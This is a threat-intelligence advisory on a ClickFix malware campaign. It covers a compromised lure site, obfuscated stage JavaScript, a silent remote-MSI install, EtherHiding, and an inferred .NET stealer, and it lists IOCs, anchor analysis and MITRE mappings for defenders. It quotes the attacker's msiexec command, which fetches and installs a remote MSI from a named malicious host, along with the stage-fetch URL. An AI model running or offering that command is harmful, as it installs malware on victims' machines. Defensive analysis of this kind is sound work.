TLP:CLEAR

SL-ADV-2026-WP-001 · v14.10 — Omegatech ClickFix → msiexec remote-MSI → EtherHiding / Donut

Unattributed cluster on AS202412 (Omegatech Ltd., SC). Attribution held at the infrastructure level only — no named actor asserted.
Advisory SL-ADV-2026-WP-001 Wave v14.10 Detonated 2026-08-24 Sample tria.ge 260824-cb5hxsxvby Lure gbcu.org.il Analyst SecureLeaf / Dispensight
CLASSIFICATION — continuation of the v14 family (v14.10), NOT v15.0.

The PowerShell is very different this wave — delivery re-tooled to a silent msiexec remote-MSI install — but every durable anchor holds: the RSA-1024 CAPI C2 handshake key fired in process memory, the C2/stage IP 158.94.211.92 is reused, and the new MSI host sits inside AS202412. A v15.0 label should be reserved for a break in the durable C2 key or code prologue — which did not occur here.

1 · Executive summary

On 2026-08-24 a fresh detonation of the WP-002 chain was captured from the compromised Israeli lure host gbcu.org.il. The victim was steered through a ClickFix clipboard-paste overlay whose client stage (/mpackage.js, a ~132 KB VM-obfuscated JavaScript) plants a silent remote-MSI command:

msiexec /i "https://cloudfrontenterprise.com/get/my?sid=<epoch-ms>-<8char>" /qn

This replaces the v14.9 IRM → password-ZIP → build.exe path with an msiexec LOLBIN (T1218.007) pulling the payload MSI over HTTPS. Three victim sessions were observed (1787536535958-i0cxy4o51787536610190-oqlgj67r1787536664828-xhrcamir); the last was leaked verbatim into Edge's Bing "parachute" search telemetry, confirming the clipboard-paste vector.

Forensic-honesty — detonation scope. The triage classifier recorded only Discovery-tactic behaviour (T1217 / T1012 / T1082 / T1124). On the wire the MSI was delivered — a ~4.26 MB TLS body transferred from cloudfrontenterprise.com — but post-install stealer, persistence and exfil behaviour were not observed in this run. The family's downstream (browser credential/cookie/wallet theft, RSA-wrapped AES exfil, DUI70 sideload persistence) is inferred from lineage, not seen in this sample.

2 · Kill chain (this wave)

Compromised lure
gbcu.org.il · 107.6.176.102
→ ClickFix stage JS
cdn.claritydelivr.com /mpackage.js
(cleartext, 158.94.211.92)
→ Clipboard paste-run
PowerShell → msiexec
→ Silent remote MSI
cloudfrontenterprise.com /get/my?sid=… /qn
~4.26 MB over TLS · 91.92.240.194
→ EtherHiding bootstrap
bsc-testnet-rpc.publicnode.com
(abused-legit)
→ [inferred] Donut .NET stealer
RSA-wrapped AES exfil

Only stages up to and including the MSI delivery + EtherHiding contact were observed on the wire. The final stage is greyed as inferred.

3 · Why this is v14, not v15 — anchor analysis

SignalThis wave (v14.10)Verdict
Durable RSA-1024 CAPI C2 key
modulus SHA-256 dc4cb858…febfac6f, e=65537
Fired in process memory (deployed ClickFix-v8 signature hit)UNCHANGED — dispositive
C2 / stage IP158.94.211.92 (AS202412, 158.94.211.0/24) — via cdn.claritydelivr.comREUSED cross-wave
Hosting ASNMSI host 91.92.240.194 ∈ AS202412 91.92.240.0/24SAME dependency
EtherHiding bootstrapBSC-testnet RPC contactedCONSISTENT
Victim token grammarsid=<epoch-ms>-<8char>CONSISTENT
ClickFix-v8 SHA1 anchor91A9773E…C674C3E0MATCHED
Delivery mechanismmsiexec remote-MSI /qn (was IRM→ZIP→build.exe in v14.9)CHANGED — wave-level
Front / stage domainscloudfrontenterprise.com · cdn.claritydelivr.com (new)ROTATED — expected
Stage filename / formmpackage.js — 132 KB VM-obfuscated JS (new)CHANGED — wave-level

Delivery re-tooling and domain rotation are exactly what a wave does; the cryptographic identity is what a family is. Both durable-key and durable-IP anchors held, so this is filed as v14.10.

4 · Behavioural analysis — what the processes are doing

5 · Network IOCs

IndicatorResolvedRoleHandling
gbcu.org.il107.6.176.102ClickFix lure (compromised)VICTIM — do NOT blocklist (splitcam)
cdn.claritydelivr.com158.94.211.92Stage/JS (mpackage.js) → durable C2/stage IPBlock / hunt
cloudfrontenterprise.com91.92.240.194MSI delivery host (CloudFront masquerade)Block / hunt
158.94.211.92AS202412 · 158.94.211.0/24Durable cross-wave C2/stage IPBlock / hunt
91.92.240.194AS202412 · 91.92.240.0/24MSI host IPBlock / hunt
bsc-testnet-rpc.publicnode.com104.20.24.117EtherHiding read layerABUSED-LEGIT — record only
cdnjs.cloudflare.com104.17.24.14 / .25.14Legit CDN (JS)Benign — do not block
splitcam rule. gbcu.org.il is a compromised third-party victim; detect the chain, not the domain. Public BSC-testnet RPC is transport — blocking it harms unrelated dApp users.

Host / command-line IOCs

MSI command
msiexec /i "https://cloudfrontenterprise.com/get/my?sid=<epoch-ms>-<8char>" /qn
Stage fetch
GET http://cdn.claritydelivr.com/mpackage.js (cleartext, from 158.94.211.92)
Victim tokens
1787536535958-i0cxy4o5 · 1787536610190-oqlgj67r · 1787536664828-xhrcamir

Durable pivots (family)

PivotValue
RSA-1024 C2 key (modulus SHA-256)dc4cb85885ffcf7bfa6f37c8ac4a8334a9504c06df0307a599c67ee2febfac6f · e=65537
ClickFix-v8 PS-stage SHA1 anchor91A9773E7A0BA4700195CBFFFF935A24C674C3E0
MZER + GetPC prologue (offset 0)4D 5A 45 52 E8 00 00 00 00 59 48 83 E9 09
Native downloader imphash8e7b065c967657cca657d11206f96e23
CLR loader imphashedc8ef44e1870aad7a3e58dab17f8e1b

6 · MITRE ATT&CK (Enterprise v16)

TacticTechniqueIDEvidence
Initial AccessDrive-by / compromised siteT1189gbcu.org.il lure
ExecutionMalicious Copy & Paste (ClickFix)T1204.004clipboard paste-run overlay
ExecutionPowerShellT1059.001PS → msiexec hand-off
Execution / Def-EvasionSystem Binary Proxy: MsiexecT1218.007msiexec /i http… /qn
Defense EvasionObfuscated Files or InformationT1027VM-obfuscated mpackage.js
Command & ControlWeb Service (EtherHiding)T1102BSC-testnet RPC
DiscoveryBrowser Information DiscoveryT1217observed
DiscoveryQuery RegistryT1012observed
DiscoverySystem Information DiscoveryT1082observed
DiscoverySystem Time DiscoveryT1124observed

7 · Companion artifacts